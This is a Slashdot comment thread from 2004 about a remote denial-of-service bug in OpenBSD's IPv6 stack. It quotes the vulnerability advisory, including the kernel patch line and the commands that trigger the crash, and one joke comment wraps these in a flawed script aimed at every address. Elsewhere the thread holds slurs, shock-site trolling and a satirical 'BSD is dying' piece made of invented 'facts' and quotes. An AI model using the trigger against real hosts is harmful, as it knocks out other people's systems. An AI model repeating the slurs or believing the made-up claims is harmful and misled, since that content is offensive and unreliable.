I dont think I'm the only sysadmin to simplify and strip-down the system as a way to personalize it. Gives me a good feeling and lots more confidence in the server.

Re:Patch for production systems?

[broken.data]

Depends on what your box is doing. I run several OpenBSD based machines; from 3.0 up to -current. First things first: if it doesn't need IPv6.. kill it on the wonderfully built in firewall. (If you don't need to patch it. I have had killing it in the custom build kill other things).

block in log on $ext_if inet proto ipv6 from any to any
block out log on $ext_if inet proto ipv6 from any to any

Does wonders....

Re:Patch for production systems?

[evilviper]

I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current.

When was the last time Microsoft released a patch in less than 24hours since the problem was announced? Even a remote root exploit couldn't possibly have a patch released in a couple hours, and this exploit is only a DoS attack, which is infinitely less damaging.

Now, if you are still convinced that you must have the patch this very instant, just use CVS to upgrade to -stable... If you've been through even a handful of pages on OpenBSD.org, you would already know that.

If you're a rational person, and not terrified by this, then just wait for a few days until a patch is made, and /eratta.html is updated...

Re:Patch for production systems?

[evilviper]

One of the reasons OpenBSD tends to be more secure is because it ships with *almost* everything off. However, there's a solid 10+ default user accounts,

You are implying that somehow, having unused user accounts is a security risk. The default accounts are all users with the password set so nobody can log-in, and the login shell set to /bin/nologin. Deleting those accounts in completely useless, since you have to be root to get access to those accounts anyhow.

Now, that's not to say OpenBSD is as safe as it could possibly be. The first thing I do is to disable the very few services already enabled, and then I start taking the SUID/SGID bits off of programs that don't need to be run (by non-root users) on that particular machine.

That is real security.... Removing daemon users, deleting non-suid/sgid files, removing the compilier; none of that is improving security AT ALL.

Re:Patch for production systems?

[Greg+W.]

One of the reasons OpenBSD tends to be more secure is because it ships with *almost* everything off. However, there's a solid 10+ default user accounts, 3-4 default services (sshd, sendmail, inetd/portmap)

To clarify: sendmail does not listen on port 25 of all network interfaces by default in OpenBSD. If you want to receive e-mail from the Internet using sendmail, you have to edit rc.conf to allow it.

Re:Patch for production systems?

And if you are a typical OpenBSD user, they we only on for about 30 seconds prior to being disabled. Thirty seconds after disabling all unneeded services, you probably erected a draconian firewall -- just to be sure (=

Re:Patch for production systems?

[Strog]

You could shorten that to one line on a recent release. A pfctl -sr will show that it is still doing it and you keep your config a little cleaner.

block log on $ext_if inet proto ipv6

Oh wow

[The+Bungi]

To quote Theo, 'it is just a crash.'

Maybe the next time Bashdork reports the new evil IE vulnerability that allows my desktop wallpaper to be changed by a hacker in Romania I'll se a quote like this one. "To quote [whomever], head of [whatever] at Microsoft, it's just a crash".

I'm sure.

Re:Oh wow

[lxs]

I'd rather have a box crashed than a box rooted. But maybe I'm just funny that way.

Re:Oh wow

[gpinzone]

kay, give us the IP address of your BSD box while I patch my Linux kernel.

Re:Oh wow

as soon as you enable remote desktop service and give us your administrator password.

Re:Oh wow

[phoenix_rizzen]

::1

There you go. Have fun.

Re:Oh wow

[mr_death]

My ip address is 127.0.0.1. Knock yourself out.

Re:Oh wow

[kamelkev]

The posters point is taken though... IMHO Theo is an ass. I was in no way surprised when the funding they were promised was pulled moments before it was to be paid. He honestly seems to go out of his way to make people feel bad, and himself feel better.

A coworker of mine was "graced" with a personal email from Theo, in which he complained that adding new features to kernels was a "stupid new meme" without actually having read the email about what my coworker was doing. ...

Although I do run Openbsd... I attribute its quality to the dedicated coders who work relentlessly to find little tiny holes.

Re:Oh wow

[gpinzone]

Remote desktop on Linux? Uh, sure.

Re:Oh wow

[gpinzone]

Wow! You've got a ton of porn on there!

Re:Oh wow

[Nimrangul]

What crackpipe have you been using? It must greatly enhance the smoking experience. The funding was not pulled "pulled moments before it was to be paid," the funds were already greatly used. There was about three months left before the funding from POSSE was ended. Theo does not seem like an ass to me, he does instead seem like someone that dismisses stupid shit that random people say because he has better things to do.

Re:Oh wow

Oh yeah, I forgot Linux doesn't have a desktop. Not one worth using, anyway. Sorry 'bout that.

Re:Oh wow

[kamelkev]

Well, I didn't do my homework, you are right that the POSSE money wasn't all pulled suddenly. I do recall reading some stories that seemed to phrase it that way on the internet, perhaps I misread.

I do stand by my statement though... (concerning the assholitude). :D

Re:Oh wow

I was under the impression that neither was even remotely possible with Linux or BSD. Maybe they're just funny that way.

Re:Oh wow

Not to mention a TON of pirated software!
Don't worry though, I just called 1-800-HOWTOTELL and
reported him.

Gotta run...someone's at the door.

Re:Oh wow

[peter]

The ipv6 loopback address is ::1. The v6-mapped version of the ipv4 loopback address is ::ffff:127.0.0.1. Why do I get the feeling that most people aren't really thinking ipv6 here?

Is it just me..

[subk]

..or should this read "If you are running IPv6 on your OpenBSD install.."

Re:Is it just me..

[blixel]

What does "cogitoergosum" mean?

Re:Is it just me..

It is naughty Latin. The correct sentence is "Coito ergo sum". Please use that instead. It seems to me humanity just uses the incorrect form, except a few wise men.

Re:Is it just me..

[subk]

I think, therefore I am.

Lol.

[anonymous+coword]

If this was on fark, the title would be

BSD Exploit discovred, Linux users laugh, Flamewar ensures!

Re:Lol.

[flatt]

Dear lord...

Re:Lol.

Except it's not an exploit, it's a DoS ... that only affects people running IPv6, with a publically accessible IP.

yay for comprehension

read. to cause the crash you need to use a remote system running the patched linux kernel

hmmmm

[rogabean]

ya know after all the depenguinator and "upgrading" your linux box to BSD articles lately...i should have some sort of witty remark to this... but sadly i dont.

RTFA

You have to have a modified ipv6 stack in order to exploit this bug, not to fix it. I can remotely crash your ipv6 enabled openbsd if I modify my linux kernel. Capisce?

Re:RTFA

[Triumph+The+Insult+C]

si.

and, you have to: 1. know my ipv6 address or hostname and 2. be able to get your ipv6 packets to me

Re:RTFA

[Sancho]

Since it's a bug in ipv6, I bet you have to have a modified ipv6 stack in order to fix it, too. :)

Re:RTFA

Back in Soviet Russia, modified ipv6 stack rolls YOU!

Re:RTFA

Exactly! There's just too many people that don't get this point exactly. It's NO where near as bad as it sounds and doesn't affect many people at all.

As an addenum to your reply, even you (the OpenBSD user...) would need to have an IPv6 address on the net in order for them to DoS you (assuming #1 and 2 in your reply...).

Oh and the TCP port that has to be listening, HAS to be a TCPv6 port AFAIK too.

Slashdotted

Remote openbsd crash with ip6, yet still openbsd much better than windows

Systems affected:
tested on openbsd 3.4
not clear about netbsd
freebsd not vulnerable

Risk: Medium
Date: 4 February 2004

Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/obsdmtu.html
Anythi ng in this document may change without notice.

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Description:
It is possible to remotely crash openbsd 3.4 if the host receives icmpv6
and there is a listening tcp port.
quoting de raadt: "it is just a crash."
remote crash which screws the kernel.
unknown whether this may be exploited for code execution.

Details:
The problem is triggered by setting small ipv6 mtu and then doing tcp
connect.
How to reproduce:
Patch linux kernel 2.4.24 net/ipv6/icmp.c :

case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

then:
ping6 openbsd
ssh -6 openbsd

Workaround:
It is believed that openbsd current is not vulnerable.
netbsd current also seems to have related changes.
check:
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/neti net6/ip6_output.c
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netine t/tcp_output.c?sortby=date

Vendor status:
open, net and free bsd were notified Sun, 1 Feb 2004 16:35:56 +0200

Georgi Guninski
http://www.guninski.com

Re:Slashdotted

[Windfinder]

Wow man, it's not even slashdotted yet. Jump the gun much??
Have a little faith in their poor server =)

Re:Slashdotted

No, I didn't. The page took a minute and a half to load for me.

Re:Slashdotted

[cgenman]

His server is running on OpenBSD. It is only a matter of time before some smart a$$ crashes it.

Re:Slashdotted

Have a little faith in their poor server =)

Yeah, it's probably running something decent, like OpenBSD. Oh, wait...

Re:Slashdotted

Too bad his server isn't likely to be using ipv6.

do FreeBSD & OpenBSD use the same kernel?

[xot]

Pardon my ignorance..but do FreeBSD n Open BSD use the same kernel?If they do does that mean that this bug would affect FreeBSD as well?

Re:do FreeBSD & OpenBSD use the same kernel?

If you click the posted link it will say "freebsd not vulnerable".

Re:do FreeBSD & OpenBSD use the same kernel?

No. They are very different operating systems with common (though now somewhat distant) origins.

Re:do FreeBSD & OpenBSD use the same kernel?

no, FreeBSD's kernel is different, NetBSD's and OpenBSD's are quite similar.

Re:do FreeBSD & OpenBSD use the same kernel?

Although there is cross pollination, NET, Free, and Open use different kernels

Re:do FreeBSD & OpenBSD use the same kernel?

[cant_get_a_good_nick]

No. They use very different kernels, though a lot of code is shared among them.

Re:do FreeBSD & OpenBSD use the same kernel?

[unixformat]

OpenBSD was developed from NetBSD, and could be called an enhanced NetBSD so NetBSD carries the greatest risk of also being vulnerable.

Re:do FreeBSD & OpenBSD use the same kernel?

ROFL @ insightful, yes I can see how someone could read your comment and be so knocked back by the overwhelming insight contained within that they had to throw a mod point at it.

Re:do FreeBSD & OpenBSD use the same kernel?

[cant_get_a_good_nick]

OpenBSD was branched from NetBSD well before IPv6 support came out. The kernels have diverged quite a lot since then. There is no enhanced risk for NetBSD. I doubt if other systems are vulnerable, just because of the fact that knowledge about security and DOS holes are shared pretty freely between the groups, and we haven't heard about FreeBSD or NetBSD.

Re:do FreeBSD & OpenBSD use the same kernel?

They all use the same KAME IPv6 stack.

http://www.kame.net

"[...] and we haven't heard about FreeBSD or NetBSD. [...]"

We kinda have.

If you read the advisory you've read NetBSD has probably patched the same problem. NetBSD and OpenBSD are rather alike than either of these is like FreeBSD.

I, for one, hope i don't have to patch my FreeBSD system. Note that i'm higher on dope...

Maybe time to drop this "securitier than thou" ?

[Tom7]

With the attitude those guys have, it's almost as amusing to hear about an OpenBSD exploit than a WinXP one!

Crash or Slash?

[Halthar]

Great, now when I try and check the linked article and cant get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.

Hell, who knows, maybe this one is Google's fault too.

So this is why...

[Tomy]

...my BSD is dying...

What are the chances....

Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and IPv6 network in the same place? I think I'd better stick to plausible worries like lighting strikes, seatbelt failures, and choking to death on my turkey dinners.

Re:What are the chances....

[zippe]

I think alot of people are missing this. If you are on the same subnet as an OpenBSD machine you can exploit this problem as no routing is required. Alot of networks are just one huge subnet or for that matter networks are misconfigured, so you can send packets directly to machines, even though routing is supposed to be required. I used to work for a very large company (to remain nameless), and I was messing around one day and decided to set my machine to a /16 network, and voila, I was able to talk to all machines in the company (stupid cisco routers, and the network admins didn't correctly configure everything). The address space was 172.28.0.0/16. So if you are on a company network, or on the same subnet, you can usually exploit this.

Re:What are the chances....

The OpenBSD machine still need to have an IPv6 address, otherwise it will ignore you.

But yeah, those Cisco routers come with a default config assuming that everyone who buys them are morons. You need to do "no ip proxyarp" to turn this crap off, and get sane routing.

See This Article for More OpenBSD Info

Still another awful blow has struck what's left of the *BSD community, as a soon-to-be-released report by an independent commission doing a year-long study concludes: *BSD is dead and mummified. Here are some of the commission's findings:

Fact: the *BSDs have balkanized yet again. There are now no less than twelve separate, competing *BSD projects, each of which has introduced fundamental incompatibilities with the other *BSDs, and frequently with Unix standards. Average number of developers in each project: fewer than five. Average number of users per project: there are no definitive numbers, but reports show that all projects are on the decline.

Fact: Apple is quietly changing the base kernel for OS X from *BSD to Linux. Insiders report that Apple's technical leadership has grown tired of the licensing battles and is seeking a more modern license; they find Linux's license more appealing. Many Apple technology experts -- from OS developers all the way up to Steve Jobs -- find Linux to be a more advanced OS, which will enable Apple to release a more mature product. The frequent hallway arguments and fistfights among the *BSD developers Apple has hired has also contributed to the decision.

Fact: XFree86 is dropping support for *BSD. The remaining core group believes that the *BSDs have strayed too far from Unix standards and have become too difficult to support along with Linux and Solaris x86. "It's too much trouble," said one anonymous developer. "If they want to make their own standards, let them doing the porting for us."

Fact: Many user-level applications will no longer work under *BSD, and no one is working to change this. The GIMP, a Photoshop-like application, has not worked at all under *BSD since version 1.1 (sorry, too much trouble for such a small base, developers have said). OpenOffice, a Microsoft Office clone, has never worked under *BSD and never will. ("Why would we bother?" said developer Steven Andrews, an OpenOffice team lead.)

Fact: servers running OpenBSD, which claims to focus on security, are frequently compromised. According to Jim Markham, editor of the online security forum SecurityWatch, the few OpenBSD servers that exist on the internet have become a joke among the hacker community. "They make a game out of it," he says. "(OpenBSD leader) Theo [de Raadt] will scramble to make a new patch to fix one problem, and they've already compromised a bunch of boxes with a different exploit."

Fact: NetBSD, which claims to focus on portability (whatever that is supposed to mean), is slow, and cannot take advantage of multiple CPUs. "That about drove the last nail in the coffin for BSD use here," said Michael Curry, CTO of Amazon.com. "We took our NetBSD boxes out to the backyard and shot them in the head. We're much happier running Linux."

Fact: There are almost no FreeBSD developers left, and its use, according to Netcraft, is down to a sadly crippled .005% of internet servers. "It's just not reliable," said Christine McGee, VP of Technology for eBay, Inc. "Nor do we find it a very modern OS. I would recommend Linux to anyone contemplating a server OS, or maybe Windows, before I would recommend a BSD."

Fact: DragonflyBSD, yet another offshoot of the beleaguered FreeBSD "project", is already collapsing under the weight of internal power struggles and in-fighting. "They haven't done a single decent release," notes Mark Baron, an industry watcher and columnist. "Their mailing lists read like an online version of a Jerry Springer episode, complete with food fights, swearing, name-calling, and chair-throwing." Netcraft reports that DragonflyBSD is run on exactly 0% of internet servers.

With these incontroverible facts staring (what's left of) the *BSD community in the face, they can only draw one conclusion: *BSD is dead and mummified.

Re:See This Article for More OpenBSD Info

How was this guy a troll? This part is totally relevant:

Fact: servers running OpenBSD, which claims to focus on security, are frequently compromised. According to Jim Markham, editor of the online security forum SecurityWatch, the few OpenBSD servers that exist on the internet have become a joke among the hacker community. "They make a game out of it," he says. "(OpenBSD leader) Theo [de Raadt] will scramble to make a new patch to fix one problem, and they've already compromised a bunch of boxes with a different exploit."

Re:See This Article for More OpenBSD Info

Christ, is this true? I'll never touch a BSD if it is.

OpenBSD crashes: how could it have been prevented?

[Debian+Troll's+Best]

This is a serious issue especially given the large number of OpenBSD firewall machines which are in service across the internet. While possibly not a direct security threat, remote crash exploits are obviously highly disruptive and in today's networked economy, highly costly in terms of lost productivity. It's good to see, however, the rapid response of th BSD community to this threat.

I was talking with some of my colleagues in network security this morning about the OpenBSD exploit and means by which future exploits may be avoided. One suggestion which was raised was that the OpenBSD 'ports' system may be to blame. After all, if you need to add packages on a BSD system, 'ports' must be opened, and when ports are open on firewall boxes, bad things happen. Debian's apt-get system for example does not require 'ports' to work properly, and therefore may be immune from this type of exploit. Is this a possible solution? I look forward to hearing the community's responses!

ADMINS: DELETE PARENT NOW!

[sheapshearer]

If slashdot is going to promote the kind of material that his link is pointing to, then I'm going back to M$ Windows and using PC World as my source of tech information. If I were to say that his link contained material of an 'extremely sick' nature, it would only be an understatement!

Re:ADMINS: DELETE PARENT NOW!

[richie2000]

OK, that just piqued my curiosity. I am very sorry it did, but it did. People, do NOT follow that link in the grandparent post. Just take my word for it. Don't. No amount of curiosity is worth seeing that.

Re:ADMINS: DELETE PARENT NOW!

[sheapshearer]

WTF? I try to give a decent warning to the public and I get modded as flamebait? Either the moderators don't click on the links, or we have some real sickos here....

Re:ADMINS: DELETE PARENT NOW!

is http://www.uberpferd.de/ the link you're talking about? If so, it doesn't have a DNS resolution here. :( And I was looking forward to being grossed out.

Re:ADMINS: DELETE PARENT NOW!

Welcome to the infamous pain.jpg series. Now that your Internet virgin cherry has been popped, we can all continue on with our lives.

Re:ADMINS: DELETE PARENT NOW!

Perhaps you should read the fine print at the top of this page:

The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.

And again at the bottom of the page:

All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest (C) 1997-2004 OSDN.

Slashdot is not responsible for what people post here. If you can't live with it maybe you should go elsewhere. Moderation works most of the time.

Re:ADMINS: DELETE PARENT NOW!

hehe beware the links. I was just as horrified the first time I saw the goatsx pic as a young slashdot noob.

Re:ADMINS: DELETE PARENT NOW!

[Neophytus]

a few months back child porn was posted and nothing was done

Re:ADMINS: DELETE PARENT NOW!

Which link we talkin about anyhow? I wanna see! lol

Re:ADMINS: DELETE PARENT NOW!

[Captain+Goatse]

FAGGOT! That link does not contain anything very offensive at all, I just saw a (little)(posted by same user) more offensive picture a few minutes ago.

We here on Slashdot do not support capitalist terrorist tactics such as CENSORING! Free speech 0wnz j00. And don't say anything bad about the FSF or you will never again be able to use the interweb. Script kiddies will write worms ten times more effective than the sucky MyDoom targeted just at you and anything you approach!

Gay niggers would hunt you down and rape your boyfriend, possibly in a way that involves a mare.

Anyway, BSD is dying ;)

Re:ADMINS: DELETE PARENT NOW!

http://bsd.slashdot.org/faq/com-mod.shtml#cm150

Slashdot does not delete comments based on thier content (except in those couple of cases where the Secret Service imposed thier will).

If /. were to censor these posts then they take a big step onto a very slippery slope.

On /., no censorship, no exceptions.

This explains why they run on Solaris!

[anonymous+coword]

It is known for a Long time that the www.openbsd.org web server runs on solaris. I have always doubted their excuse for the bandwidth from sunsite. Surley they could co-located a OpenBSD server at sunsite, Now I know the real reason. OpenBSD's Security features are mostly academic and NOT READY for primtime in mission critical use, even the OpenBSD developers themselves wont use it as their main OS!

OpenBSD is still concidered a hobby security OS in the Security Industry by many. Most Military grade security systems run on Windows 2000, and is the most secure certified operating system. Sure the Applications such as IIS can be exploitable, the the Windows 2000 kernel has never been comprimised remotley. Microsoft has even challenaged hackers 10 million dollars to exploit Windows 2000 Military Security Edition!

So for now, as a Security Specialst who Specializes Windows security, I will keep using Windows, and I will use this toy security system on my isolated testing network.

Re:This explains why they run on Solaris!

Most Military grade security systems run on Windows 2000, and is the most secure certified operating system.

There seems to be a leak in slashdot's subspace containment fields - a post from a strange parallel universe leaked into this thread!

Re:This explains why they run on Solaris!

it runs on solaris cause its a donated site from University of Alberta.

Re:This explains why they run on Solaris!

[DARKFORCE123]

Its Slowlaris . Please use the terminology correct next time.

Re:OpenBSD crashes: how could it have been prevent

[GirTheRobot]

regarding the second paragraph...YOU HAVE TO BE KIDDING!
I would mod this FUNNY...not insightful.

Such misunderstanding on common hacking lingo

[0xfc]

> To quote Theo, 'it is just a crash.'"

Yes, just a crash. Because you know he was trying like mad to get a remote exploit out of it. Some bugs are a d0s and others are simply not exploitable. Not so hard to understand how people use the phrase, "just a crash", with a disapointed puppy dog look because they cannot get mad props for dissing on Theo.

As for the people who did not understand patching your kernel so you can exploit the bug on openbsd.
HA!

Please continue using windows and being an end luser.

I consider this bug to be like an interesting post. Georgi will just get karma from it. Nothing more.

After all, who needs a bug to d0s someone from the face of the earth?

His way was just more elegant.

Re:Such misunderstanding on common hacking lingo

[stor]

After all, who needs a bug to d0s someone from the face of the earth?

Exactly. All it takes is a fractal on the Google homepage or a link from /.

Cheers
Stor

Re:Such misunderstanding on common hacking lingo

[Tom7]

After all, who needs a bug to d0s someone from the face of the earth?

I dunno, man, winnuke was a big problem on our campus in 98(?). It's so much easier to crawl through a block of IPs sending a few packets than to DOS the whole netblock. You can even do it from a modem in a few minutes.

Re:Maybe time to drop this "securitier than thou"

[FuzzzyLogik]

the difference is they fix it in a timely fashion...

Re:OpenBSD crashes: how could it have been prevent

rofl, nice ;)

even better someone just modded it insightful, please stop before I spit the rest of my coffee over the monitor.

kaka

I poop on you

Re:OpenBSD crashes: how could it have been prevent

[jazman_777]

After all, if you need to add packages on a BSD system, 'ports' must be opened, and when ports are open on firewall boxes, bad things happen.

Ha ha ha, very funny.

Remote openbsd crash with ip6

yet still openbsd much better than windows... cause we say so. What a dumb way of defending yourself, why brush off your bug by saying "At least we're not windows!". Why don't you own up to the fact that "Hey we found a bug, but since we're open source we can fix it right away"

Re:Remote openbsd crash with ip6

Duh: Guninski != Theo
Can you say "who said what?!"

Maybe not...

[Simon+Carr]

There are days on this network where I wish the latest MS vulnerability was just a crash. 'member those great days? It may not even get reported because it would be such low key news.

Anyway, for this remote takedown to work, you also have to be running an IPV6 stack, right? At the moment that's a pretty small segment of techies.

Note: I am not an OpenBSD apologist... I am a Mac apologist.

Re:Maybe not...

[Zebedeu]

Note: I am not an OpenBSD apologist... I am a Mac apologist.

Steve?
Now now, don't be so hard on yourself, we don't really think it's necessary to apologise :)

Re:OpenBSD crashes: how could it have been prevent

[richie2000]

Good troll. Not quite Insightful, but still. :-)

(Moderators: The BSD ports system has slightly less than nothing to do with TCP/IP ports being open, closed or missing on firewall or other machines. It's just a homonym (no, it has absolutely nothing to do with gays).)

Mod Parent Troll Down, Please

Stupid trolls.

GOATSE link and WORSE in parent (NT)

[Kiffer]

GOATSE link and WORSE in parent...

It's only a crash....fun with python

Hey but is only a crash nothing at all to worry about...

Patch linux kernel 2.4.24 net/ipv6/icmp.c :

case ICMPV6_ECHO_REPLY: /* we coulnd't care less */
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev); //joro

then:
ping6 openbsd
ssh -6 openbsd

#!/usr/bin/python
import popen2,string

def cmd_execute(cmd):
p = popen2.Popen3(cmd)
p.wait()
return string.strip(p.fromchild.read())

#kill everybody
for a in range(0,255):
for b in range(0,255):
for c in range(0,255):
for d in range(0,255):
execute('ping6 ' + a + '.' + b + '.' + c + '.' + d)
execute('ssh -6 ' + a + '.' + b + '.' + c + '.' + d)

Re:It's only a crash....fun with python

[JDWTopGuy]

Indentation screwed up for last loop (I assume that's slashdot's fault).

Re:It's only a crash....fun with python

[pHDNgell]

How is this funny? Pinging IPv4 address with IPv6? If you're going to make a joke, at least get it right.

Re:It's only a crash....fun with python

Hey fuck face, IPv4 adresses translates into IPv6. Sheesh. Shut the fuck up biatch.

Re:It's only a crash....fun with python

[Sime208]

#kill everybody
for a in range(0,255):.......

Phew, as my IP begins 217., I should be safe from this beastie as soon as a reaches 127 and your own box resets :-)

Re:OpenBSD crashes: how could it have been prevent

Easy: upgrade to Linux. *BSD is dying anyway.

damn!

good thing nobody uses IPv6 and never will! :-)

Re:OpenBSD crashes: how could it have been prevent

Who the hell modded this up? The ports system like apt-get make internally initiated connections to servers. They don't start listeners up. You can run you own internal mirror of either.

about ipv6

[MrLint]

Not log ago there was an article about not only how ipv6 isnt needed, but that since its 'new' code, it has a lot of problems that have long since been worked out of ipv4. Is this an example of that? Should we worry?

I have to ask myself that with all of the decades of experience that has gone into ipv4 development and hacking and exploiting, are these fears justified? Have all the glitches in ipv4 been found? and if so isnt it trivial to avoid the same early mistakes in ipv6. Does this particular problem have a ipv4 analog? Is it even a stack theory issue? Is it just an implementation oversight?

Does anyone have any insight?

Re:about ipv6

[Richard_at_work]

This is a problem with an IMPLEMENTATION of the IPv6 stack, so its not IPv6 thats at fault, but rather this code. There is still problems appearing today with regards to different peoples implementations of the IPv4 protocol, so I guess you cant really say theres a problem as such, since there will always be the possibility for a future implementation to fuck up badly. And suprisingly, the IPv6 implementation that MS provides for WinXP is actually a damn good one. Many people dont beleive MS can produce good code, and I dont know if they produced this one or if they bought it in, but its worthy of praise, so here it is :)

Re:about ipv6

[rtaylor]

Problem is, it's not only needed but it's already in very heavy use. Too late to back out now.

My understanding is that most major backbones have switch over due to the benefits in reduced load on their routers (less data processing needs to occur).

This would mean most IPV4 traffic is already translated (tunneled) across IPV6 at one point or another.

Can anyone confirm or deny?

Re:about ipv6

[burns210]

ipv6 is a must-upgrade solution... it IS newer code, it does get rid of NAT(which is partially used for security) and ipv4 DOES have some hacks to make it scale higher... however, once all of china connects to the net, all of india, all of everyone, there just physically isn't enough. And NAT just ins't a clean solution when used with private addressing, it works, but it is a hack to an unavoidable fix.

ipv6 has security built into it, more addresses then particles in the universe, and eliminates the need for private addressing and nat... we should move to ipv6 if for no other reason than it is a cleaner, better solution to internet addressing.

Re:about ipv6

[Tim+the+Gecko]

No major backbones carry IPv4 tunneled over IPv6. You might be thinking of MPLS which is present in a lot of backbone networks.

It's hard to believe there is 'heavy' use of IPv6 when the dedicated IPv6 exchange in the UK peaks at 4Mbit/s of traffic and the LINX exchange in London has >30Gbit/s of IPv4 traffic

https://lg.ipv6.btexact.com/lgmrtg/hopper-day.html

http://www.linx.net/tools/stats/index.thtml

Re:about ipv6

[drinkypoo]

blah blah blah, fud foo bar baz.

Of course we're going to have the same early mistakes. We're going to have most of them before you or I ever start using it, though. Unless you're thinking about using it now, and my question is, why? For experimental networks okay, maybe you want to have a bunch of tiny autonomous robots with routable IP addresses or something, I can dig that. But other than that I can see little need for IPv6 right now. There just aren't enough people using it. And where you might need it, you'll probably be in relative control of the network.

Re:Maybe time to drop this "securitier than thou"

But they are "securitier than thou." You're pretty much asking them to change their focus, do you think that security is a bad goal?

Maybe you need to get out of this sports mentality and stop feeling inadequate when another "team" is doing better in one area than your favorite?

Re:Maybe time to drop this "securitier than thou"

Flaming assholes and arrogant pricks we are, but even then a remote crash is the best you can do?

C'mon.

Re:Maybe time to drop this "securitier than thou"

Beside, a remote crash is annoying, but it isn't a remote compromise. Besides it is limited to IP6. It will be more worrying when it is a IP4 remote compromise on a more common OS.

Re:Maybe time to drop this "securitier than thou"

I didn't do anything, it was Guninski. I don't give a crap about OpenBSD.

Re:Maybe time to drop this "securitier than thou"

> I didn't do anything

Exactly.

MISSISSIPPI GHOSTSE

[GhostseTroll]

A professor at the University of Mississippi is giving a
lecture on the supernatural. To get a feel for his
audience, he asks: "How many people here believe in
ghostses?" About 90 students raise their hands.

"Well, that's a good start. Out of those of you who
believe in ghostses, do any of you think you've ever seen
a ghostse?" About 40 students raise their hands.

"That's really good. Has anyone here ever talked to a
ghostse?" 15 students raise their hands.

"That's great. Has anyone here ever touched a ghostse?" 3
students raise their hands.

"That's fantastic. But let me ask you one question
further... Have any of you ever made love to a ghostse?"
One student way in the back raises his hand.

The professor is astonished and says, "Son, in all the
years I've been giving this lecture, no one has ever
claimed to have slept with a ghostse. You've got to come
up here and tell us about your experience."

The redneck student replies with a nod and a grin, and
begins to make his way up to the podium. The professor
says, "Well, tell us what it's like to have sex with a
ghostse."

The student replies, "Ghostse?!? From ah-way back there ah
thought yuh said "goatse."

IPv7?

[w00t_sargasso]

Ok so why the hell dont they just add a few more octets onto a ipv4 address? afraid to rewrite a.b.c.d as a.b.c.d.e.f?

lol... I crack me up

Re:IPv7?

[prog-guru]

You mean like the telco industry, that tacks on a new area code, ick.

IPv6 has enough space to address every particle in the universe, it's a more complete solution.

Re:IPv7?

[daem0n1x]

IPv6 has a lot more features such as encryption, signature, QOS, etc.
It is also extensible. New features may be added and they will be in a chain of headers in the datagram. An implementation may ignore the headers it doesn't know.
IPv6 is the future, inspite of all those naysayers out there

Re:IPv7?

[weicco]

Maybe because 6 bytes can't fit in address field which length is 4 bytes, you would trash the option-field or data :P

Re:IPv7?

[w00t_sargasso]

lol... did I need to prefix my first comment (IPv7) with [] and []?

I think ipv4 is outdated, yes. But it is easy, unlike ipv6, quite stable and extremly workable...

Re:IPv7?

[42forty-two42]

Yes, it's far easier to write:

ping6 127.0.0.0.0.0.0.0.0.0.0.0.0.0.0.1

than:

ping6 ::1

Sending Packets on Ethernet vs. Kernel Patch

[billstewart]

Many operating systems let you write raw Ethernet packets to the Ethernet. Most operating systems let you write raw IP packets to the IP subsystem, which then routes them and sends them to Ethernet or whatever, though sometimes "you" have to be root or maybe another privileged user. A much smaller number of operating systems let you write raw IPv6 packets to the IPv6 subsystem.

So maybe you need to patch a Linux OS to get some help sending broken ICMPv6 packets, or maybe you just need to do creative writing to the Ethernet. But you could certainly get MS-DOS to let you do it, and presumably also Windows.

Re:Sending Packets on Ethernet vs. Kernel Patch

I'm not disagreeing with that, I was just clarifying what the Slashdot blurb said.

-Roofus

Cowboyneil needs to check his head

[JDizzy]

It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.

I think CowboyNeil needs to check his Linux using head before reporting on BSD ever again.

Re:Cowboyneil needs to check his head

Why? You'd make sure you knew what he was talking about before making an ass of yourself in public, wouldn't you?

Re:Cowboyneil needs to check his head

[Crimson+Midget]

First of all it's CowboyNeal.
Secondly, there's nothing wrong with his statement. In order to exploit the bug, you need to be running a patched Linux kernel to send the necessary packet.

MISSISSIPPI GHOSTSE FOR YOUR BUNGHOLE

[GhostseTroll]

A professor at the University of Mississippi is giving a
lecture on the supernatural. To get a feel for his
audience, he asks: "How many people here believe in
ghostses?" About 90 students raise their hands.

"Well, that's a good start. Out of those of you who
believe in ghostses, do any of you think you've ever seen
a ghostse?" About 40 students raise their hands.

"That's really good. Has anyone here ever talked to a
ghostse?" 15 students raise their hands.

"That's great. Has anyone here ever touched a ghostse?" 3
students raise their hands.

"That's fantastic. But let me ask you one question
further... Have any of you ever made love to a ghostse?"
One student way in the back raises his hand.

The professor is astonished and says, "Son, in all the
years I've been giving this lecture, no one has ever
claimed to have slept with a ghostse. You've got to come
up here and tell us about your experience."

The redneck student replies with a nod and a grin, and
begins to make his way up to the podium. The professor
says, "Well, tell us what it's like to have sex with a
ghostse."

The student replies, "Ghostse?!? From ah-way back there ah
thought yuh said "goatse."

Your Bowels Cleansed

Let me ask you this...which is worse:

A. The engine on your Lexus freezes up at 160,000 miles instead of 300,000. You take a financial hit and you are forced to buy a Camry this time.

B. You start bleeding during bowel movements. You go to the doctor and get poked, prodded, X-ray'd, biopsied, etc. 3 days later you get a call for a consultation. The doctor informs you that you have advanced colon cancer at 45 years old. You have anywhere from 6 months to 5 years left to live. He tells you it's time to get your house in order because you'll be checking out soon. Chemotherapy starts today.

